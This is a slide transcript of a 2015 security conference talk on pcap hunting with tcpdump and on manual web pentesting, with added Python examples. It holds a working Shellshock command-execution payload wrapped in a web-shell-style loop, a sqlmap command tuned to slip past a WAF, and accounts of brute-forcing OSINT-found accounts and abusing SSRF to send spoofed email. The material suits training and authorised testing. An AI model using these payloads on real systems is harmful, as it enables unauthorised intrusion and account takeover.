InfoSec Hunters and Gatherers (BSides Charm 2015)
By Primal Security
1
Who Are We?
• Primal Security: www.primalsecurity.net
–Blog, Podcast, Tutorials
•Our blog and tutorials documented a lot of our
experience through OSCP/OSCE
2
Zack Meyers
@b3armunch
• Continuous Monitoring Enthusiast
• PrimalSec team member and Web
Application Pentester
GET
• Any and all information I can EVER find on
offensive techniques, tools and procedures.
POST
• I love hot sauce and will eat small meals
periodically throughout the day aka “Zack
Snacks” :)
3
Andrew McNicol
@PrimalSec
• Security consultant
• Co-Founder and one of the lead authors of
Primal Security blog/podcast
try:
    print 'I enjoy writing error-free Python with Google and stackoverflow'
except: pass
• I spend my day abusing features in web
applications - previous IR (pcap, malware)
4
Quick Outline
• Hunter/Gatherer
• Defensive Use Cases:
– Slicing and dicing pcap w/tcpdump + Dshell
– Staying ahead of the game
• Offensive Use Cases:
– A pentest is not a scan
– Pushing Past Walls
– Abusing Contact Us/Feedback Features
– Testing Remediation #ThinkDifferently
• Making Your Own Tools - A quick look at Python
5
We didn’t do it
• We are not lawyers and/or giving you any
legal advice.
• We are not giving you permission or
authorizing you in any way to do anything.
• In fact don’t do anything ever...
6
This talk
• Too many people only leverage automated tool
output to perform their job function
• We plan to share some of our experience on going
beyond automated tools.
• Note: We do like automated tools – This is not a
talk on bashing them!
7
What is a Gatherer?
• Someone who leverages automated tools:
– Find vulnerabilities with scanners
– Find interesting network traffic with an IDS
8
What is a Hunter?
• One who goes beyond automated tools to:
– Find vulnerabilities missed by vulnerability scanners
– Find evil in a sea of pcap
– Writes their own tools
9
Hunter Mindset
• General Zod or John Wick mode #Focus
#Confidence
10
Defensive Use Cases
11
WARNING – PCAP Ahead
12
Hunting with tcpdump
• The ability to rip through pcap using
tcpdump/Bash is a very useful skill
• Profiling network activity can help you find
what might be missed
• We have a whole talk just on this topic:
–www.primalsecurity.net/being-the-hunter-with-tcpdump
13
Hunting with tcpdump Cont.
• How do you deal with the output?
– BPFs and Linux Utilities
14
Hunting with tcpdump: Linux Utilities
• grep / egrep - Powerful search utilities
–Useful switches -i, -v
• sort / uniq
• awk - Awesome utility, lots of functionality - I use it to print parts of a line
–Useful switch -F (set the field separator)
15
Hunting with tcpdump: BPFs
• Berkeley Packet Filters (BPFs) select only the packets of interest:
– host
– net
– port
– src / dst
– Boolean logic (and, or)
– Protocol specific (tcp, udp, icmp, etc.)
16
Useful Bash 1-liner for tcpdump
• Useful 1-liner to run tcpdump over multiple files, one after another:
for i in *.pcap; do <tcpdump_comm>; done
• Globbing directly (rather than parsing `ls`) copes with odd filenames; the same loop works for any command you need to run over a set of files
17
Hunting with tcpdump: DNS
• I see DNS as a treasure trove of information
• You may find me getting dragon sickness over
all the gold in DNS :)
18
Hunting with tcpdump: DNS Cont.
• Summarizing DNS with tcpdump/Bash:
–for i in *.pcap; do tcpdump -ttttnnr "$i" 'udp and port 53'; done | grep ' A? '
19
Hunting with tcpdump: DNS Cont.
•Summarizing DNS with tcpdump/Bash (slides 20-21: terminal screenshots, not preserved in this transcript)
•Advanced DNS BPF (slides 22-23: screenshots, not preserved in this transcript)
23
Hunting with tcpdump: Outbound
Connections
• Find the SYN every hour ☺ #NeedleInHaystack (beaconing hides in plain sight)
• Same approach as DNS, but this time we summarize the dst IP of each SYN packet
24
Hunting with tcpdump: Outbound
Connections Cont.
• Quick BPF to key in on SYNs: "tcp[13]=2" (byte 13 of the TCP header is the flags byte; 2 means SYN and nothing else)
– Caveat: SYNs with ECN bits set (CWR/ECE) won't match that exact value; "tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn" catches those too
• Next we will use "awk" to grab just the dst IP
25
Hunting with tcpdump: Outbound Connections Cont.
• Now we can summarize the dst IPs with "awk" and "sort/uniq"
26
Hunting with tcpdump: Outbound Connections Cont.
• To speed things up, extract just the IPs and feed the list to a script that looks up network info (CIDR / net owner)
27
Hunting with tcpdump: Outbound Connections Cont.
• Now we can add in a bit of Python to look up network info via Team Cymru's IP-to-ASN whois service (the cymruwhois module):
28
Hunting with tcpdump: Outbound Connections Cont.
•Advanced BPF example (slide 29: screenshot, not preserved in this transcript)
29
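The summarizing steps on slides 19 through 28 survive here only as screenshots, so what follows is an added example (not the talk's own script) that does the same work in Python: it parses constructed tcpdump output for the DNS " A? " summary and for the SYN destination summary, builds the bulk query for Team Cymru's IP-to-ASN whois service, and parses a constructed reply in that service's verbose format. The capture lines, names, addresses and AS numbers are made up; on a real engagement you would pipe tcpdump output into the parsers and send the query text to whois.cymru.com on TCP port 43.

```python
import re
from collections import Counter

# Constructed sample of `tcpdump -ttttnnr capture.pcap 'udp and port 53'` output.
# Hosts, names and addresses are made up for the example.
SAMPLE_DNS = """\
2015-04-11 09:00:01.000001 IP 10.0.0.5.51234 > 10.0.0.1.53: 1234+ A? www.example.com. (33)
2015-04-11 09:00:01.000900 IP 10.0.0.1.53 > 10.0.0.5.51234: 1234 1/0/0 A 93.184.216.34 (49)
2015-04-11 09:00:02.000001 IP 10.0.0.5.51235 > 10.0.0.1.53: 1235+ A? www.example.com. (33)
2015-04-11 09:00:03.000001 IP 10.0.0.7.40001 > 10.0.0.1.53: 1236+ A? xk3j9s2.badc2.example. (38)
2015-04-11 09:00:04.000001 IP 10.0.0.5.51236 > 10.0.0.1.53: 1237+ AAAA? www.example.com. (33)
"""

# Constructed sample of `tcpdump -ttttnnr capture.pcap 'tcp[13]=2'` output (SYN only).
SAMPLE_SYN = """\
2015-04-11 09:00:05.000001 IP 10.0.0.5.50001 > 203.0.113.10.443: Flags [S], seq 1000, win 29200, length 0
2015-04-11 09:00:06.000001 IP 10.0.0.7.50002 > 198.51.100.23.8080: Flags [S], seq 2000, win 29200, length 0
2015-04-11 09:00:07.000001 IP 10.0.0.5.50003 > 203.0.113.10.443: Flags [S], seq 3000, win 29200, length 0
2015-04-11 09:00:08.000001 IP 10.0.0.9.50004 > 203.0.113.10.443: Flags [S], seq 4000, win 29200, length 0
"""

# Query lines look like "... IP src.port > dst.53: id+ [edns flags] QTYPE? name. (len)".
DNS_QUERY_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.53: \d+\+? (?:\[[^\]]+\] )?"
    r"(?P<qtype>[A-Z]+)\? (?P<name>\S+) "
)
# SYN lines carry "Flags [S]"; ECN-capable SYNs show up as [SEW], which is also
# why the byte-exact BPF tcp[13]=2 misses them.
SYN_RE = re.compile(r"IP (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[S[EW]*\]")


def summarize_dns_queries(text, qtype="A"):
    """Count queried names of one record type: the grep ' A? ' | sort | uniq -c step."""
    counts = Counter()
    for m in DNS_QUERY_RE.finditer(text):
        if m.group("qtype") == qtype:
            counts[m.group("name").rstrip(".")] += 1
    return counts


def summarize_syn_destinations(text):
    """Count (dst IP, dst port) pairs seen in SYNs: the awk + sort/uniq step."""
    counts = Counter()
    for m in SYN_RE.finditer(text):
        counts[(m.group("dst"), int(m.group("dport")))] += 1
    return counts


def cymru_bulk_query(ips):
    """Request body for Team Cymru's bulk IP-to-ASN service (whois.cymru.com, TCP 43),
    e.g. `nc whois.cymru.com 43 < query.txt`. One lookup per unique address."""
    return "begin\nverbose\n" + "\n".join(sorted(set(ips))) + "\nend\n"


# Constructed reply in the verbose format the service returns; the AS numbers
# (64496/64497 are reserved for documentation) and owners are not real lookups.
SAMPLE_CYMRU_REPLY = """\
Bulk mode; whois.cymru.com [2015-04-11 09:10:00 +0000]
64496   | 203.0.113.10     | 203.0.113.0/24      | US | arin     | 2010-01-01 | EXAMPLE-NET, US
64497   | 198.51.100.23    | 198.51.100.0/24     | NL | ripencc  | 2011-02-02 | EXAMPLE-HOST, NL
"""


def parse_cymru_reply(text):
    """Map IP -> ASN / prefix / country / owner from a verbose bulk reply."""
    info = {}
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 7 or not fields[0].isdigit():
            continue  # banner line, or an unrouted address reported as "NA"
        asn, ip, prefix, cc, _registry, _allocated, owner = fields
        info[ip] = {"asn": asn, "prefix": prefix, "cc": cc, "owner": owner}
    return info


if __name__ == "__main__":
    for name, n in summarize_dns_queries(SAMPLE_DNS).most_common():
        print(f"{n:4d}  A? {name}")
    syns = summarize_syn_destinations(SAMPLE_SYN)
    owners = parse_cymru_reply(SAMPLE_CYMRU_REPLY)
    for (dst, port), n in syns.most_common():
        who = owners.get(dst, {})
        print(f"{n:4d}  {dst}:{port}  AS{who.get('asn', '?')}  {who.get('owner', '?')}")
```

Feeding `cymru_bulk_query(dst for dst, _ in syns)` to the service and joining the parsed reply back onto the SYN counts gives the per-owner view the slides build up to, which is where an odd-looking hosting provider with a single SYN per hour stands out from the CDNs at the top of the list.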
Hunting with Dshell
• Dshell is a Python-based network forensic framework for hunting in pcap
• It reassembles data spread across several packets (a DNS request and its response, an HTTP request/response pair) and prints the relevant details as one evenly spaced line per flow
30
Hunting with Dshell Cont.
• Dshell has several modules for hunting:
– dns: matches up request/response
– synrst: SYN followed by RST/ACK
– netflow
– web: parses HTTP request/response
• Check out the blog post on SANS ISC:
– https://isc.sans.edu/diary/Another+Network+Forensic+Tool+for+the+Toolbox+-+Dshell/19277
31
Be in the Know
• As InfoSec professionals we all sit on a pile of vulnerability data and system version information that can look overwhelming at a glance.
• So adjust your approach to keep yourself alert…
• Be the Continuous Monitoring Hunter and Gatherer for your firm through these techniques...
32
Follow, Read, Apply, Repeat
• Follow other info sec professionals via twitter for the
latest news.
• Read security blogs and rss feeds for information on the
newest vulnerabilities/ exploits that are trending today.
• Apply what you read and identify your firm's footprint if
applicable (via vuln data or hunting with tools) or create
a lab environment (VM) to test a recent exploit.
• Repeat this process throughout the day whenever you have downtime.
33
Some CM Examples
• Any security professional can appreciate a
heads up!
- Knowing info on the next BIG SCARY VULN
before management does…#Heartbleed
#Shellshock #POODLE #GHOST
• Even knowing something as simple as a piece of software having an out-of-band patch, a security bulletin or an approaching EOL
- (e.g. public updates for Java SE 7 ended in April 2015, the month of this talk)
34
Spread Awareness
• Sharing information and
knowledge about threats as
they emerge can not only help
you, but more importantly your
TEAM.
• Reference blogs and the NIST
NVD once a CVE is released to
help track/ communicate
amongst your team.
35
Offensive Use Cases
36
Scans Ran, Found Nothing…So Secure, Right?
• Often the focus of an assessment is to run
tools and get things “scanned”:
– “Did you run your scans?”
– “How many checks did it fail?”
37
Managers will ask
38
Pushing Past Walls
•Hacking is all about massive amounts of
failure and not giving up
•The right mindset is critical to being
successful
39
Pushing Past Walls
40
Pushing Past Walls Cont.
• Recent pentest we found a WordPress server
•Could access login panel - So brute force is in!
–Enumerate valid usernames via login error messages
•Wpscan found some stuff to play with:
–Avada Theme with Revslider
–Paid Memberships Pro Path Traversal Vulnerability
–Photo Gallery <= 1.2.7 - Unauthenticated SQL injection
41
Pushing Past Walls: Attack Plans
• Brute Force: Had a valid username - very slow ☹
• Paid Memberships Pro 1.7.14.2 Path Traversal:
– Worked! Sweet LFI (Grabbed wp-config.php)
– It was via a php readfile() so no code execution
42
Pushing Past Walls: Attack Plans
• Photo Gallery <= 1.2.7 - SQL injection
• In lab:
– Read up on the vulnerability
– Replicated it in a lab environment and w00tw00t, it worked
• On the assessment server:
– Needed a valid Gallery ID for the server
– Attempted the MSF module and failed ☹
– Dug through pcap: a few requests in, RSTs from the server…hmm, potential WAF
43
Pushing Past Walls: Attack Plans
• Figured out how to replicate the finding on lab
setup with sqlmap:
• sqlmap -u "<target_URL>" -p "order_by" --random-agent --tamper=between --dbms=mysql --level=5 --risk=3
– sqlmap on the target site – still blocked!
– Added "--delay=<seconds>" and found a 4 second delay was needed to avoid triggering the WAF
44
So I am back to this again…..
45
Pushing Past Walls: Attack Plans
• Result? Took a long time, but it worked (DB enum, table enum, --dump wp_users):
– Screenshot from the lab setup (not preserved in this transcript)
46
Pushing Past Walls
• Was able to crack the user hashes, authenticate to the server and completely compromise the web app
• Great win here, but lots of places I nearly stopped
and had to push past to be successful
• Much easier to give up
47
Contact Us and Feedback Forms
48
Example: SSRF open relay
•Server Side Request Forgery (SSRF) vulnerabilities
can make the web app your puppet:
–Contact Us Forms
–Feedback Forms
–Forms to request external services:
•tweets-grab.php
49
Example: SSRF open relay Cont.
• Another team gave this site a clean bill of health
after a WebInspect scan + remediation
• Automated tools weren’t really working too well
(Automated tool said 30 days)
• Started to manually test features with Burp as
proxy and found SSRF open relay ☺
50
Example: SSRF open relay Cont.
• Gave me the ability to send emails to anyone, appearing to come from anyone in the organization (#BeefHook)
51
Example: Vulns in Unlinked Content
• SharePoint sites are a common case: visiting the FQDN shows a default IIS page, but some Google-fu, Burp's engagement tools, etc. turn up much more
• site:<FQDN> or inurl:<FQDN>, then layer on additional search operators to dig out interesting content:
filetype:<extension> (maybe a .bak or .old), or -<term> to exclude results (kinda like grep -v)
• You find a new set of unlinked directories and resources that establish a whole new attack surface!
52
Example: Vulns in Unlinked Content
• Most automated tools will only evaluate linked
content
• Enumerating technology in use and making requests
for default content – lots of wins (default admin
panels, vulnerable resources, etc.)
– Google searching “<technology> exploit”
• Lots of vulns could be hanging out unlinked in the
app
53
Username Enumeration
• Difference in login messages
•Password reset feature?
– Attempting to reset the web admin “Which admin
username did you want to reset?”
• Metadata in documents on site
54
Username Enumeration Cont.
• In our experience web applications commonly
don’t have strong password complexity
requirements
– “password3” “p@ssword”….yes they still work
• Enumerating usernames, combined with no
lockout features, and some wordlists =
account compromise:
– Deploy code, emails, upload files, etc.
55
OSINT Example
• Found Admin video on Youtube
• Found Admin’s Github, LinkedIn, Facebook
• Found Admin’s email in README of source code
• Validated username via “Forgot my username” feature
• Found additional people connected to the admin who liked his Facebook post and worked for the same organization:
– Brute forced their accounts and gained access to the application
•We have a whole talk on OSINT:
www.primalsecurity.net/osint/
56
Scanner Takes Too Long
• Not uncommon for an automated tool to say
“Estimated time 34 days…”
57
Automated Tool Crashes App
• Not uncommon for an automated tool to tip over a server
• Throw an automated tool at a sensitive web
application... You might see something like
this:
58
Automated Tool Crashes App Cont.
• Should still be noted in the report as a finding
- The real internet scans applications too, so a scanner-induced crash is a denial-of-service exposure
•You should also be able to fall back to manual testing to ensure the other vulnerabilities still get enumerated
59
Testing Remediation Example
• fileupload.php (client-side mime type check)
bypass it by changing the “Content-Type”
60
Testing Remediation Example
• Developer fixes with additional server side
checks and names the file fileupload2.php
• How would you go about testing this?
61
Testing Remediation Example
Cont.
• I saw my input pass to “fileupload2.php”
• I thought “Hmm, I wonder if fileupload.php is
still accessible…”
62
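An added illustration of the remediation test on slides 60 to 62, written in Python rather than PHP (the original fileupload.php and fileupload2.php are not on the page, so the two checks below are assumed stand-ins, not the developer's code): the first function trusts the client-supplied Content-Type the way the original did, the second validates on the server from the extension and the file signature, and a small regression helper runs the same samples through every endpoint that is still deployed, which is what catches a forgotten fileupload.php. The upload samples are constructed.

```python
# Python stand-ins for the PHP upload handlers the talk describes (the real
# fileupload.php / fileupload2.php are not on the page; these are illustrative).

# File signatures for the only types the feature is meant to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions a web server might execute if they appear anywhere in the name.
EXECUTABLE_EXT = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "pl", "asp", "aspx", "jsp"}


def allowed_by_content_type(filename, content_type, data):
    """fileupload.php-style check: trusts the multipart Content-Type header the
    client sent, so the bypass is one header edit in Burp."""
    return content_type in ("image/png", "image/jpeg", "image/gif")


def allowed_by_magic(filename, content_type, data):
    """fileupload2.php-style server-side check: extension allowlist, no
    executable extension anywhere in the name, and the bytes must match the
    claimed type. The client's Content-Type is ignored entirely."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False
    ext = "jpg" if parts[-1] == "jpeg" else parts[-1]
    if EXECUTABLE_EXT & set(parts[1:]):   # shell.php.png style double extensions
        return False
    if ext not in MAGIC:
        return False
    return data.startswith(MAGIC[ext])


def remediation_regression(endpoints, samples):
    """Run every sample through every endpoint that is still deployed. The point
    from the talk: shipping the fix as fileupload2.php leaves fileupload.php
    answering, so the old bypass has to be re-tested against both paths."""
    return {
        name: [fname for fname, ctype, data in samples if check(fname, ctype, data)]
        for name, check in endpoints.items()
    }


# Constructed upload samples: a PNG, a PHP file that claims to be one, and a
# double-extension polyglot that carries a real PNG header.
PNG_SAMPLE = ("photo.png", "image/png", MAGIC["png"] + b"\x00" * 16)
WEBSHELL_SAMPLE = ("shell.php", "image/png", b"<?php echo 'hi'; ?>")
DOUBLE_EXT_SAMPLE = ("shell.php.png", "image/png", MAGIC["png"] + b"<?php echo 'hi'; ?>")

if __name__ == "__main__":
    deployed = {"fileupload.php": allowed_by_content_type, "fileupload2.php": allowed_by_magic}
    samples = [PNG_SAMPLE, WEBSHELL_SAMPLE, DOUBLE_EXT_SAMPLE]
    for endpoint, accepted in remediation_regression(deployed, samples).items():
        print(f"{endpoint}: accepts {accepted}")
```

Even the stricter check only decides what gets written; a complete fix also stores uploads under a server-generated name outside the web root (or serves them with a fixed, non-executable content type), and the regression run has to include every path the old handler answered on, not just the new one.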
Making Your Own Tools
63
Learning a Scripting Language
• I find it a necessary part of my day to day
• Learning a scripting language isn’t that hard
• It’s like starting a friction fire
64
Python
• Python is my weapon of choice
• This talk won't teach you how to write Python, but
we plan to show some examples
–We have a whole talk and tutorial on Python:
•Talk: www.primalsecurity.net/introduction-to-python-for-security-professionals/
•Tutorial: www.primalsecurity.net/tutorials/python-tutorials/
• We suggest picking a small project and tackle it
65
Python Resources
• Courses:
– SecurityTube’s Python Scripting Expert Course
– Google has a free course on Python
– Codecademy Python course
• Books:
– Violent Python by TJ O'Connor
– Gray Hat and Black Hat Python by Justin Seitz
66
Python Modules
• Python has a lot of built-in and 3rd party modules
that can do the heavy lifting for you
• OS command and whois lookup examples (slide 67: screenshots, not preserved in this transcript)
67
Python Web Scanner
• During our assessments we find it very useful
to make custom scripts to automate
interaction with web applications
• Making web requests in Python is a very
practical use case
68
Python Web Scanner Cont.
• A basic web scanner example (slide 69: screenshot, not preserved in this transcript)
69
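Slide 69's scanner exists only as a screenshot, so this is an added example (not the Primal Security script) of the same idea in standard-library Python: a wordlist-driven GET scanner that records interesting status codes and can be throttled with a delay so it does not do to a fragile app what slide 58 warns automated tools do. It brings up a constructed local target on a loopback port so it runs offline; that target's paths and responses are made up.

```python
import threading
import time
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the assessment host: a tiny local web app with a few
# paths, one of them unlinked (/backup.zip) and only reachable by guessing.
TARGET_PATHS = {"/": 200, "/login.php": 200, "/admin/": 200, "/backup.zip": 403}


class _TargetHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        code = TARGET_PATHS.get(self.path, 404)
        body = f"{code} for {self.path}\n".encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the request log quiet
        pass


def start_target():
    """Serve the constructed app on a random loopback port; returns the server."""
    srv = HTTPServer(("127.0.0.1", 0), _TargetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe(base_url, path, user_agent="Mozilla/5.0 (compatible; assessment-script)"):
    """GET one path and return (status, body_length). urllib raises HTTPError for
    4xx/5xx, which is still an answer worth recording (403 = exists, forbidden)."""
    req = urllib.request.Request(base_url + path, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def scan(base_url, wordlist, interesting=(200, 301, 302, 401, 403), delay=0.0):
    """Request every path in the wordlist and keep the ones that answer with an
    interesting status. `delay` (seconds) throttles the loop for sensitive apps."""
    hits = {}
    for path in wordlist:
        status, size = probe(base_url, path)
        if status in interesting:
            hits[path] = (status, size)
        if delay:
            time.sleep(delay)
    return hits


if __name__ == "__main__":
    target = start_target()
    base = f"http://127.0.0.1:{target.server_port}"
    words = ["/", "/login.php", "/admin/", "/backup.zip", "/fileupload.php", "/wp-login.php"]
    for path, (status, size) in scan(base, words).items():
        print(f"{status}  {size:6d}  {base}{path}")
    target.shutdown()
```

Recording the body length alongside the status is deliberate: applications that answer 200 for everything give themselves away by a constant size, and a single unusual length in a sea of identical "not found" pages is the kind of thing the hunter notices and the scanner does not.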
More Advanced Web Scanner
•PrimalSec <!-- Web Testing Framework -->
70
Python examples - ShellShock
• In Corelan training at DerbyCon …..deprived of sleep
and overdosed on red bull -> Enter ShellShock
–Had to spin up a tool to check for ShellShock
71
Python - ShellShock Cont.
• Below is a quick Proof of Concept (PoC) for Shellshock (slide 72: screenshot, not preserved in this transcript)
72
Python - ShellShock Cont.
•Example output (slide 73: screenshot, not preserved in this transcript) - this illustrates how to automate an RCE so it feels like a web shell
73
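An added Shellshock (CVE-2014-6271) checker and command loop, standing in for the PoC screenshots on slides 72 and 73 (this is not the authors' code). It builds the bash function-definition header, tells a real execution apart from a page that merely reflects the User-Agent by looking for an echoed marker, and takes a pluggable transport; the two fake transports and the /cgi-bin/status.cgi path are constructed for the example, and http_send is what you would plug in against a host you are authorised to test.

```python
import urllib.request

# Marker echoed before the command output so a vulnerable reply can be told
# apart from a page that merely reflects the User-Agent back.
MARKER = "PRIMALSEC_SHELLSHOCK_CHECK"


def shellshock_header(command):
    """Header value for CVE-2014-6271: a bash function definition followed by a
    trailing command. A vulnerable bash runs the trailer when the CGI handler
    exports the header into its environment; the echoed Content-Type line and
    blank line give the CGI a valid header block so the output lands in the
    HTTP body. `command` must not contain single quotes."""
    return "() { :; }; echo Content-Type: text/plain; echo; echo %s; /bin/bash -c '%s'" % (MARKER, command)


def extract_output(body):
    """Command output after the marker, or None if the trailer never ran."""
    if MARKER not in body:
        return None
    return body.split(MARKER, 1)[1].strip()


def run_command(url, command, send):
    """One round trip. `send(url, headers) -> body` is injected so the loop can
    be driven by a real HTTP client or by the constructed transports below."""
    headers = {"User-Agent": shellshock_header(command)}
    return extract_output(send(url, headers))


def pseudo_shell(url, send, commands):
    """Run a list of commands in turn; a read-eval loop over this is all the
    'make it feel like a web shell' automation amounts to."""
    return [(cmd, run_command(url, cmd, send)) for cmd in commands]


def http_send(url, headers, timeout=10):
    """Real transport for an authorised test against a CGI script."""
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Constructed transports: one behaves like a vulnerable bash CGI for a couple of
# commands, one like a patched host. No real server is involved.
FAKE_RESULTS = {"id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)", "hostname": "lab-cgi"}


def fake_vulnerable_send(url, headers):
    agent = headers.get("User-Agent", "")
    if not agent.startswith("() {"):
        return "<html>ok</html>"
    cmd = agent.split("/bin/bash -c '", 1)[1].rstrip("'")
    return "\n%s\n%s\n" % (MARKER, FAKE_RESULTS.get(cmd, ""))


def fake_patched_send(url, headers):
    return "<html>ok</html>"


if __name__ == "__main__":
    target = "http://127.0.0.1/cgi-bin/status.cgi"   # hypothetical path
    send = fake_vulnerable_send                        # swap for http_send on a real engagement
    if run_command(target, "id", send) is None:
        print("not vulnerable (or not a bash CGI)")
    else:
        for cmd, out in pseudo_shell(target, send, ["id", "hostname"]):
            print(f"$ {cmd}\n{out}")
```

The marker is what makes this a check rather than a guess: a WAF or a debugging page that echoes request headers will show the payload text, but only a bash that actually parsed the function definition produces the marker on its own line followed by the command's output.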
Writing Scripts for the Assessment Report
• Writing a script that demonstrates a vulnerability for the report helps convey the impact:
– LFI/RFI -> shell
– Automating an RCE into a web-shell-style loop
– Automating an SSRF to show its potential impact
74
Useful Training
• Offensive Security: OSCP/OSCE
• eLearnSecurity
• SANS
• Vulnhub.com
• We have a talk covering this in more depth:
–www.primalsecurity.net/how-to-be-an-infosec-geek/
75
In Summary
• We hope this talk inspired more people to:
– Be a Hunter and Gatherer
– Pick up a scripting language or Bash Kung Fu
#StartTheFire
• Hopefully you can go out tomorrow and find
bad guys or vulnerabilities that may have
been missed for days, months, or even years!
76
Contact Us
• Primal Security
–Website: www.primalsecurity.net
–Email: andrew@primalsecurity.net
–Twitter: @PrimalSec, @b3armunch
77

Weitere ähnliche Inhalte

Was ist angesagt?

[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 

Was ist angesagt? (20)

How To Start Your InfoSec Career
How To Start Your InfoSec CareerHow To Start Your InfoSec Career
How To Start Your InfoSec Career
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 -  N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis   ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 

Ähnlich wie BSides_Charm2015_Info sec hunters_gathers

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 

Ähnlich wie BSides_Charm2015_Info sec hunters_gathers (20)

My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
